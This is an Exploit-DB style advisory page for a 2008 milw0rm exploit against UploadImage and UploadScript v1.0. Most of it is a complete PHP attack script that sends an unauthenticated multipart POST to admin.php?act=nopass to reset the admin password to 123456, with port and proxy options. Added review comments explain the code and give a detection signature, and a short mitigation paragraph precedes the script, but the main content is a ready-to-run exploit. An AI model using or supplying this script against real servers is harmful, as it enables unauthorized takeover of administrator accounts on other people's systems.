vendor:
UploadImage v1.0 & UploadScript v1.0
by:
Y! Underground Group
7.5
CVSS
HIGH
Remote Change Admin Password Exploit
CWE
Product Name: UploadImage v1.0 & UploadScript v1.0
Affected Version From: UploadImage v1.0 & UploadScript v1.0
Affected Version To: UploadImage v1.0 & UploadScript v1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

UploadImage v1.0 & UploadScript v1.0 Remote Change Admin Password Exploit

This exploit allows an unauthenticated attacker to remotely change the admin password on a target server running UploadImage v1.0 or UploadScript v1.0. The password-change function does not verify that the caller is authenticated, so a single crafted request is enough to set a new admin password; no credentials or prior access are required.

Mitigation:

To mitigate this vulnerability, update to the latest version of UploadImage or UploadScript if a fixed release is available (no patch is listed above). Additionally, ensure that the server is configured so that the administrative interface cannot be reached by unauthenticated clients.

Exploit-DB raw data:

<?php

/*
        \\\|///
      \\  - -  //         Y! Underground Group
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[!] Portal   :   UploadImage v1.0 & UploadScript v1.0
[!] Download :   http://www.uploadscript.net
[!] Type     :   Remote Change Admin Password Exploit
{!} Home     :   http://nobody.ir

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

*/

// Usage banner: with fewer than five argv entries (script name, host, path
// and at least two more) the help text is printed and the process exits.
// NOTE(review): the example in the banner passes only three arguments after
// the script name, which this check rejects; it does not match the threshold.
if ($argc<5) {
print_r('
*********************************************************************

Usage: php '.$argv[0].' Host Path Options
host:       Target server (ip/hostname)
path:       Path To Folder

Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy

Example:
php '.$argv[0].' 127.0.0.1 /Path/ -P1.1.1.1:80

*********************************************************************
');

die;
}

// Silence every PHP diagnostic (this also hides the undefined-variable
// notices the rest of this script would otherwise emit), lift the execution
// time limit, and cap socket connect/read waits at 5 seconds.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  // Hex-dump helper (not called anywhere else in this script). Returns the
  // bytes of $string as space-separated two-digit lowercase hex, a CRLF, then
  // the same bytes as printable characters (anything outside 33..126 shown as
  // '.'), each preceded by two spaces. Both views get a CRLF after every
  // 15 bytes.
  $hexView = '';
  $asciiView = '';
  $inLine = 0;
  $len = strlen($string);
  for ($pos = 0; $pos < $len; $pos++)
  {
    $byte = ord($string[$pos]);
    $printable = ($byte > 32) && ($byte <= 126);
    $asciiView .= '  ' . ($printable ? $string[$pos] : '.');
    $hexView .= sprintf(' %02x', $byte);
    if (++$inLine == 15)
    {
      $inLine = 0;
      $hexView .= "\r\n";
      $asciiView .= "\r\n";
    }
  }
  return $hexView . "\r\n" . $asciiView;
}
// Shape check for the -P option: "a.b.c.d:port". The surrounding parentheses
// are the PCRE delimiters. Only the digit pattern is checked, not octet or
// port ranges.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
/**
 * Sends one raw HTTP request and stores the complete response in global $html.
 *
 * Reads $proxy, $host, $port and $proxy_regex from the global scope. With an
 * empty $proxy the socket goes straight to $host:$port; otherwise $proxy must
 * match $proxy_regex ("ip:port") and the packet is sent to the proxy instead.
 * Any connection failure prints a message and terminates the process (die).
 *
 * @param string $packet complete request, headers and body, as sent on the wire
 * @return void the response is handed back only through the global $html
 */
function sendpacket($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    // No explicit timeout argument, so the ini default_socket_timeout applies.
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    // Direct connection: read line by line until the server closes the socket.
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    // Proxied connection: read one byte at a time. Because the two conditions
    // are joined with "or", the loop ends only once the stream is at EOF AND a
    // CRLFCRLF header terminator has been seen; if the proxy closes the
    // connection before a blank line arrives, fread() keeps returning '' and
    // this loop does not terminate.
    // NOTE(review): eregi() was removed in PHP 7.0, so on PHP 7+ this line
    // raises an undefined-function Error and the request aborts here.
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   // Derives a seed from the wall clock (not called anywhere else in this
   // script): whole seconds plus the fractional part scaled by 100000.
   // microtime() without arguments returns "fraction seconds" as one string,
   // so the two fields are split on the space first.
   [$fraction, $seconds] = explode(' ', microtime());
   $scaled = (float) $fraction * 100000;
   return (float) $seconds + $scaled;
}

// Positional arguments: target host and the URL path of the application
// directory. $path is later used verbatim as the prefix of "admin.php", so it
// is expected to end with "/"; nothing checks that here.
$host=$argv[1];
$path=$argv[2];

$port=80;
$proxy="";
// Option parsing. NOTE(review): the loop starts at argv[7], so with fewer than
// eight argv entries no -p/-P option is ever read and the defaults above stay
// in effect. $cmd is appended to here but never used afterwards.
for ($i=7; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
// Absolute-URL form intended for proxied requests. NOTE(review): $p is not
// used when the request line is built below; the relative $path is sent in
// both cases.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// Multipart body of the password-change form: a "submit" field and a "pass"
// field carrying the new value. NOTE(review): $data is never initialised
// before this .= (an undefined-variable notice, hidden by error_reporting(0)).
$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="submit"

Set Password
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="pass"

123456
-----------------------------7d6224c08dc
';

// Unauthenticated POST to admin.php?act=nopass carrying the form body above;
// no cookie or credential header is sent. Detection note: a POST to admin.php
// with act=nopass from a client that has no authenticated session is the
// request signature of this attack. Content-Length is strlen($data), i.e. the
// byte length, which is the correct value for the wire.
$packet ="POST ".$path."admin.php?act=nopass HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
// NOTE(review): the response stored in global $html is never inspected; this
// message is printed whether or not the server accepted the change.
echo "New Password Is 123456";
?>

# milw0rm.com [2008-01-09]